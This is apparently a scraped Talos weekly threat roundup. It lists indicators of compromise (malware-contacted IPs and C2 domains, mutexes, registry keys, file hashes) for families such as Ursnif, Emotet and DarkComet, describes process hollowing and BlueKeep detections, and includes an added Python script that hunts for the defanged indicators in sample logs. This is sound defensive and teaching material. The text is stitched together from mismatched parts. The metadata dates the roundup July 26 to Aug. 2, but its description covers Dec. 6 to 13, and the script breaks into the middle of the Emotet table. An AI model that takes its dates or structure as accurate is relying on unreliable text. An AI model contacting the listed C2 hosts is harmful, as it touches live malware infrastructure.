\n`107[.]165[.]236[.]233` | 11 \n`154[.]90[.]68[.]52` | 11 \n`50[.]63[.]202[.]88` | 5 \n`50[.]63[.]202[.]70` | 4 \n`184[.]168[.]221[.]73` | 3 \n`184[.]168[.]221[.]85` | 2 \n`184[.]168[.]221[.]74` | 2 \n`50[.]63[.]202[.]73` | 1 \n`45[.]39[.]189[.]31` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`bjerfogxz[.]ddns[.]net` | 12 \n`www[.]af0575[.]com` | 11 \n`www[.]fz0575[.]com` | 11 \n`www[.]wk1888[.]com` | 11 \n`af0575[.]com` | 7 \n`rktmcnd123[.]codns[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\XXXXXX579E5A5B VVVVVVrr2unw==` | 11 \n`%SystemRoot%\\XXXXXX579E5A5B VVVVVVrr2unw==\\svchsot.exe` | 11 \n`%SystemRoot%\\XXXXXX2CD24958` | 1 \n`%SystemRoot%\\XXXXXX2CD24958\\svchsot.exe` | 1 \n \n#### File Hashes\n\n` 21ec5795c07ed8c65dced2ca73a94f870cde60947574a06861cdf199af788dfa 26c6a08b58e3d5ff4d67ff39198306c9e7f681876f0b2ebe66fed7bedbfb1aae 3a2e092cefd3fcb61f5411a0bd03fdeb9fa48cfa3f439522e2f2090b0d1b4035 3ca6404e74295a09db3747db63d04600915b772bba68e6c9a7ecca07f6175337 5458070fe2e706f6c0559fafaba2ee6cd2c57e3b9d578d3d6bef860e2f60683f 5f4af61b5e7f60cb4db4faf750fa148a4c019052e126c96ed9c6bed672e8a8dc 6db119c36ff19b5f8a288fe515fb3a20980495d36c071feca82d0e664567c78c 8b8a6a9551c89b8d7a561d25ac5ea0e3482ceff12fa48d15060d20e74957fb75 9702dbfb26ad6cebd6d223a2503e7a84cef55ee09e8db9a1201fa054dd81f913 bc46ec7de14d120876ae205f133864b3bb25a1514cc583479eec1a84bcd99b39 fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1 fe6d46a51cc7b1b7330c81c2c513cf152a74d69c46e3266bcc7f9ad126ba3b78 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YPfV0hk_MzU/XURFNSjfRDI/AAAAAAAAB6c/2UXhrXnk0qUR6WrA2JQTe7LwFcIrdrvLACLcBGAs/s1600/fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DiQTlcddsb0/XURFRKbXKyI/AAAAAAAAB6g/pAfsNoLc-uYEOtD4ObZVzl2esVlXmrimQCLcBGAs/s1600/fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1_tg.png>)\n\n \n\n\n#### 
Umbrella\n\n[](<https://1.bp.blogspot.com/-66XwOVuceSY/XURFV5jXtMI/AAAAAAAAB6o/NhsSyNsPDPoPkybh2CdBVDFgRd4Q927hwCLcBGAs/s1600/1bc0cc8e902068bced4d8a5a3995996e4004aaf4f7f7d472a137ead9d9531f6a_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Ursnif-7083691-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 27 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 27 \n`<HKCU>\\Software\\AppDataLow\\Software\\Microsoft\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: apiMPQEC ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client32 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client64 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: datat3hc ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Dmlogpui ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 2 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 2 \nMutexes | Occurrences \n---|--- \n`killsoldierS` | 28 \n`songSixLe` | 28 \n`Local\\https://www.avast.com/` | 27 \n`Local\\https://vars.hotjar.com/` | 26 
\n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 5 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 5 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 5 \n`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 5 \n`Global\\6ed2e341-b08b-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]12[.]206` | 27 \n`157[.]240[.]18[.]19` | 27 \n`172[.]217[.]12[.]198` | 27 \n`172[.]217[.]10[.]104` | 27 \n`169[.]54[.]251[.]164` | 27 \n`152[.]199[.]4[.]33` | 27 \n`23[.]221[.]50[.]102` | 27 \n`13[.]109[.]156[.]118` | 27 \n`172[.]217[.]10[.]4` | 26 \n`157[.]240[.]18[.]35` | 26 \n`23[.]41[.]182[.]96` | 24 \n`172[.]217[.]3[.]110` | 23 \n`104[.]107[.]26[.]214` | 22 \n`204[.]79[.]197[.]200` | 21 \n`65[.]55[.]44[.]109` | 21 \n`104[.]107[.]18[.]91` | 21 \n`23[.]41[.]181[.]230` | 20 \n`38[.]126[.]130[.]202` | 20 \n`13[.]107[.]21[.]200` | 18 \n`204[.]11[.]109[.]66` | 17 \n`23[.]221[.]50[.]122` | 16 \n`23[.]221[.]49[.]75` | 16 \n`204[.]2[.]197[.]202` | 16 \n`173[.]194[.]175[.]157` | 15 \n`23[.]54[.]215[.]147` | 15 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`googleads[.]g[.]doubleclick[.]net` | 27 \n`www[.]googletagmanager[.]com` | 27 \n`www[.]google-analytics[.]com` | 27 \n`connect[.]facebook[.]net` | 27 \n`www[.]googleadservices[.]com` | 27 \n`avast[.]com` | 27 \n`static[.]avast[.]com` | 27 \n`mc[.]yandex[.]ru` | 27 \n`dev[.]visualwebsiteoptimizer[.]com` | 27 \n`amplifypixel[.]outbrain[.]com` | 27 \n`pixel[.]mathtag[.]com` | 27 \n`tr[.]outbrain[.]com` | 27 \n`amplify[.]outbrain[.]com` | 27 \n`ajax[.]aspnetcdn[.]com` | 27 \n`img-prod-cms-rt-microsoft-com[.]akamaized[.]net` | 27 \n`az725175[.]vo[.]msecnd[.]net` | 27 \n`script[.]hotjar[.]com` | 27 \n`static[.]hotjar[.]com` | 27 \n`c[.]s-microsoft[.]com` | 27 \n`assets[.]onestore[.]ms` | 27 \n`www[.]avast[.]com` | 27 \n`vars[.]hotjar[.]com` | 27 \n`static3[.]avast[.]com` | 27 \n`action[.]media6degrees[.]com` | 27 \n`6679503[.]fls[.]doubleclick[.]net` | 27 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\prefs.js` | 5 \n`%TEMP%\\RES<random, matching [A-F0-9]{4}>.tmp` | 5 \n`%TEMP%\\seuyoffm.dll` | 1 \n`%TEMP%\\seuyoffm.out` | 1 \n`%TEMP%\\2orfeuv0.dll` | 1 \n`%TEMP%\\2orfeuv0.out` | 1 \n`%TEMP%\\xgn0se5v.dll` | 1 \n`%TEMP%\\xgn0se5v.out` | 1 \n`%TEMP%\\6624.bi1` | 1 \n`%TEMP%\\omznovgy.dll` | 1 \n`%TEMP%\\omznovgy.out` | 1 \n`%TEMP%\\CSC144932DD66624AD4A66FAEED56434A36.TMP` | 1 \n`%TEMP%\\CSCDA1AB6EFEFE44DDB43A48EBFF8742A.TMP` | 1 \n`%TEMP%\\uqovbfke.dll` | 1 \n`%TEMP%\\uqovbfke.out` | 1 \n`%TEMP%\\CSC16F899F61E954B869696D94AD85DEDF4.TMP` | 1 \n`%TEMP%\\0m1c0rej.dll` | 1 \n`%TEMP%\\0m1c0rej.out` | 1 \n`%TEMP%\\0m1c0rej.0.cs` | 1 \n`%TEMP%\\0m1c0rej.cmdline` | 1 \n`%TEMP%\\uqovbfke.0.cs` | 1 \n`%TEMP%\\uqovbfke.cmdline` | 1 \n`%TEMP%\\RESE10.tmp` | 1 \n`%TEMP%\\CSCBAA72AD8A34F43D688C3F6093AC2A3B.TMP` | 1 \n`%TEMP%\\hcfrzhfk.dll` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 
09de71ba2e0a093748878986b5a845a6a826009638f11dbc0cac7450d55943bd 184abb514e009fbeedeb23d28f3f4d2ba30f2407680dbdda112e5a2761cb904b 1b4576a2a5ba0f49f1475c2b993201acea056c342bdc0c7eaabd22718e1a52bb 1ec792344097e1ebd114fd49e90e3d0a040a11bb18d3bef5333aebbe12a95a59 1fa590f73f1cce34190ef3975835ad9d48bf03a3718fdb306cd5dae387dc91b9 1ff1c2bd12738bc3ee36651917e52d76bb2c165b6b96594dac4c9179c6ee3c1f 2496306cf77459222d8aad059e22bdde9d963561c7495589e907517b4fdcf495 25062ef38c0e9751e8b619eed7ab76a4fe61d4c178db9c1b9dddd2cf49afbbac 28a09b1a512cbc0b51850b82a99dfec4597b8fd0a5647d461bb2642fab259792 2992047d9fa9e052e63c116a4d66929306ca5e484aae00c5cbf16df8429e9c52 34a36bc17cc76d13e8610b10dddd0855b4c7ec4545a21048843bba1a3b0165ed 3aefeaad4bb74267dfeb3bfacba97f112df7fd4d6bcf0011da48ef723530fcdf 3af45cf6205e4ccec0d57e0dafd09054167b337f4ddd4cb46ed17b16f5247b42 4437c72cd4f0e98ff080328135531b5bd83cd9420731ccb1ec3c410207b931b9 4dd835aa054bc5e17bd4a38454b94fec1565dcea9883b1adfbac691d5a014a3c 4e1e91f011e8a233409ac3cbd4c99d5b8e202296fe11c745fdb37daf48bb9a6e 4f2171077a8413912ed96f60514396708e6aeac2b88124bb9c1fce5858d42597 5147f2ac46cb1f5716b6b84ad6f89480b317e788c05ce2e2dce7c8355f214e5d 5efe419c36aa35ed45f7892304e509093e5d7bcf3eaeea424cc00fb44bf78aae 6c22722f45247e1384fc7b1cce569cdf6e07c38faf56c8aa63880172f2a9d54a 7236e727ba5221e7b863c5748e4837e170ed15cd7f9e6608029b7117a021552a 7a8b10e464c31aa574dd3d8f6d41d4361ebbb5c1e48ff08b3871789287056c75 8cdce07c34684d8613e50bd66df5acbe3f88513417c02049ec25d927ee6dee8f 90263c41cca8e6215b1b1d90c90fbb396b104cb284463e798be50d4c3849cf72 92babffc76f0e8cdd1e58ed39c001943c3b30e2e220abd7f1fcb65e8e4c3829d `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-GhNb_0FGLyY/XURFd7N7vkI/AAAAAAAAB6s/MSkd0hsj6UoaGLKofNVAUAnZFSnnnFBLACLcBGAs/s1600/28a09b1a512cbc0b51850b82a99dfec4597b8fd0a5647d461bb2642fab259792_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-w2jRC7gPlcw/XURFjWj-O7I/AAAAAAAAB60/pBMEXHAZwWQc1X7AbvhC1iP80qdqC5KsQCLcBGAs/s1600/1b4576a2a5ba0f49f1475c2b993201acea056c342bdc0c7eaabd22718e1a52bb_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-7iZ3yvsxN8E/XURFofm55BI/AAAAAAAAB68/XPAhHocFOJAvm9boWIrYgrPvd8gk6Hz3wCLcBGAs/s1600/25062ef38c0e9751e8b619eed7ab76a4fe61d4c178db9c1b9dddd2cf49afbbac_umbrella.png>)\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nMadshi injection detected \\- (1834) \n--- \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions, so a detection of it is not malicious by itself; it is also possible for malware to use the same technique. \nKovter injection detected \\- (1447) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nTrickbot malware detected \\- (974) \nTrickbot is a banking Trojan which appeared in late 2016. 
Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been evolving rapidly in the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nExcessively long PowerShell command detected \\- (935) \nA PowerShell command with a very long command-line argument, which may indicate an obfuscated or encoded script, has been detected. PowerShell is an extensible Windows scripting language present by default on every version of Windows since Windows 7. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. \nCVE-2019-0708 detected \\- (347) \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption in Remote Desktop Services which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (266) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then creates a legitimate child process in a suspended state, unmaps or overwrites the child's original executable image before it ever runs, writes the unpacked payload into the child's address space in its place, and resumes the child's main thread, so the payload executes under the name and path of the legitimate program. \nGamarue malware detected \\- (172) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. 
\nDealply adware detected \\- (83) \nDealPly is adware that claims to improve the user's online shopping experience. It is often bundled into otherwise legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into webpages. Adware has also been known to download and install malware. \nInstallcore adware detected \\- (60) \nInstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising as pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nPowerShell file-less infection detected \\- (45) \nA PowerShell command was stored in an environment variable and then run. The environment variable is commonly set by a previously run script and is used as a means of evasion, because the payload appears neither in a file on disk nor in the PowerShell command line itself. This behavior is a known tactic of the Kovter and Poweliks malware families. \n \n
ID TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A Type talosblog Title Threat Roundup for July 26 to Aug. 2 Published 2019-08-02T08:36:00 Modified 2019-08-02T08:36:00 Href http://feedproxy.google.com/~r/feedburner/Talos/~3/hNEZe9LGHA4/threat-roundup-0726-0802.html CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Lastseen 2019-12-13T21:13:47 BulletinFamily blog CVE list CVE-2019-0708
Description
[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 6 and Dec. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. 
Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7446804-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.Razy-7434602-0 | Packed | Razy is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data and sends it to a command and control (C2) server. Information collected might include screenshots. 
The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Packed.DarkComet-7433889-1 | Packed | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Trojan.Gamarue-7440316-0 | Trojan | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud. \nWin.Dropper.Fareit-7431743-0 | Dropper | The Fareit trojan is primarily an information stealer with the ability to download and install other malware. \nWin.Dropper.Tofsee-7440661-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nWin.Ransomware.Cerber-7432369-1 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, other file extensions are used. \nWin.Trojan.ZeroAccess-7432508-1 | Trojan | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serving as a platform for conducting click-fraud campaigns. 
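The IOC tables in these roundups are defanged (`91[.]74[.]175[.]46`, `www[.]4celia[.]com`) and come with the warning that a single match does not indicate maliciousness, so hunting with them means refanging the rows, matching them against your own telemetry, and then demanding corroboration before raising an alert. The script below is an added example and is not Talos tooling. Its IOC rows are copied from the post's IP and domain tables (a few per family; the full lists are in the linked JSON), its `key=value` log lines are constructed for the demonstration, the two-indicators-per-family corroboration threshold is a heuristic of my own, and the extra defang spellings it accepts (`(.)`, `{.}`, `[dot]`) go beyond the `[.]` form the post uses. The `/31` row from the DarkComet table is handled as a network rather than a single address.

```python
"""Refang the roundup's IOC rows and hunt for them in constructed log lines."""
import ipaddress
import re
from collections import defaultdict

# Rows copied from the post's IOC tables, grouped by the family they were
# listed under. Format is the post's own "`value` | occurrences".
IOC_TABLES = {
    "Doc.Downloader.Emotet-7446804-0": """
`91[.]74[.]175[.]46` | 7
`205[.]144[.]171[.]176` | 7
`www[.]4celia[.]com` | 16
`travalogo[.]com` | 9
""",
    "Win.Packed.Razy-7434602-0": """
`107[.]172[.]83[.]151` | 10
`dec8973[.]duckdns[.]org` | 10
""",
    "Win.Packed.DarkComet-7433889-1": """
`78[.]159[.]135[.]230` | 4
`173[.]194[.]175[.]108/31` | 1
`simond[.]zapto[.]org` | 4
""",
}

# Constructed log lines (not from the post): DNS answers and outbound
# connections in a made-up key=value format.
SAMPLE_LOG = """
2019-12-10T09:58:11Z host=ws-17 type=dns query=www.4celia.com answer=91.74.175.46
2019-12-10T09:58:12Z host=ws-17 type=conn dst=91.74.175.46 dport=443
2019-12-10T10:02:40Z host=ws-17 type=dns query=travalogo.com answer=205.144.171.176
2019-12-10T10:15:03Z host=ws-23 type=dns query=dec8973.duckdns.org answer=107.172.83.151
2019-12-10T10:15:04Z host=ws-23 type=conn dst=107.172.83.151 dport=4782
2019-12-10T11:30:00Z host=ws-41 type=conn dst=173.194.175.109 dport=443
2019-12-10T11:31:00Z host=ws-52 type=dns query=mail.zapto.org answer=10.0.0.1
"""

ROW_RE = re.compile(r"^`([^`]+)`\s*\|\s*(\d+)\s*$")
KV_RE = re.compile(r"(\w+)=(\S+)")
# The post only uses "[.]"; the other spellings are a generalization.
DEFANG_DOT = re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", re.IGNORECASE)


def refang(value: str) -> str:
    """Turn a defanged indicator back into a matchable one."""
    return DEFANG_DOT.sub(".", value.strip()).lower()


def parse_ioc_table(text: str) -> list:
    """Parse "`value` | occurrences" rows into [(refanged_value, occurrences)]."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((refang(m.group(1)), int(m.group(2))))
    return rows


def build_matchers(tables: dict) -> list:
    """Return [(family, kind, value, matcher)]; matcher(observed) -> bool."""
    matchers = []
    for family, text in tables.items():
        for value, _count in parse_ioc_table(text):
            try:
                net = ipaddress.ip_network(value, strict=False)
            except ValueError:
                net = None
            if net is not None:
                # A single IP becomes a /32, so the /31 row needs no special case.
                def ip_match(observed, net=net):
                    try:
                        return ipaddress.ip_address(observed) in net
                    except ValueError:
                        return False
                matchers.append((family, "ip", value, ip_match))
            else:
                # Exact match or subdomain of the listed name.
                def dom_match(observed, dom=value):
                    observed = observed.lower().rstrip(".")
                    return observed == dom or observed.endswith("." + dom)
                matchers.append((family, "domain", value, dom_match))
    return matchers


def hunt(log_text: str, matchers: list) -> dict:
    """Return {host: {family: set(matched indicator values)}}."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        fields = dict(KV_RE.findall(line))
        host = fields.get("host")
        if not host:
            continue
        observed = [v for k, v in fields.items() if k in ("query", "answer", "dst")]
        for family, _kind, value, match in matchers:
            if any(match(o) for o in observed):
                hits[host][family].add(value)
    return hits


def triage(hits: dict, min_distinct: int = 2) -> dict:
    """One IOC is weak evidence; require distinct indicators of the same family."""
    verdicts = {}
    for host, fams in hits.items():
        for family, values in fams.items():
            verdict = "corroborated" if len(values) >= min_distinct else "weak"
            verdicts.setdefault(host, []).append((family, verdict, sorted(values)))
    return verdicts


if __name__ == "__main__":
    for host, rows in sorted(triage(hunt(SAMPLE_LOG, build_matchers(IOC_TABLES))).items()):
        for family, verdict, values in rows:
            print(f"{host}: {family} [{verdict}] {', '.join(values)}")
```

Running it reports ws-17 (Emotet) and ws-23 (Razy) as corroborated, ws-41 as a weak single hit on the `/31` range, and nothing for ws-52, whose `mail.zapto.org` lookup shares only a dynamic-DNS parent with the listed `simond.zapto.org`. The family-level threshold matters because the "does not indicate maliciousness" tables in these posts also carry shared infrastructure (the doubleclick, google-analytics and akamaized rows above), and a lone match on such a row says nothing on its own.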
\n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7446804-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 16 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 7 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 7 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 7 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 7 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43} ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\FLAGS ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0\\WIN32 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\HELPDIR ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43} ` | 1 
\n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\FLAGS ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\0\\WIN32 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-3E2075206B43}\\2.0\\HELPDIR ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 7 \n`Global\\M98B68E3C` | 7 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]107[.]68[.]85` | 9 \n`100[.]79[.]88[.]70` | 9 \n`100[.]94[.]136[.]45` | 9 \n`100[.]90[.]27[.]84` | 9 \n`100[.]112[.]60[.]67` | 9 \n`91[.]74[.]175[.]46` | 7 \n`205[.]144[.]171[.]176` | 7 \n`77[.]90[.]136[.]129` | 4 \n`173[.]255[.]214[.]126` | 4 \n`96[.]38[.]234[.]10` | 3 \n`173[.]194[.]175[.]108` | 2 \n`82[.]223[.]190[.]138` | 2 \n`217[.]116[.]0[.]237` | 2 \n`103[.]6[.]198[.]100` | 2 \n`54[.]88[.]144[.]211` | 2 \n`212[.]227[.]15[.]142` | 2 \n`217[.]116[.]0[.]228` | 2 \n`62[.]149[.]128[.]210` | 2 \n`62[.]149[.]152[.]151` | 2 \n`52[.]96[.]62[.]226` | 2 \n`185[.]102[.]40[.]53` | 2 \n`83[.]219[.]92[.]20` | 2 \n`196[.]44[.]176[.]42` | 2 \n`41[.]190[.]32[.]8` | 2 \n`62[.]149[.]152[.]152` | 2 \n \n*See JSON for more 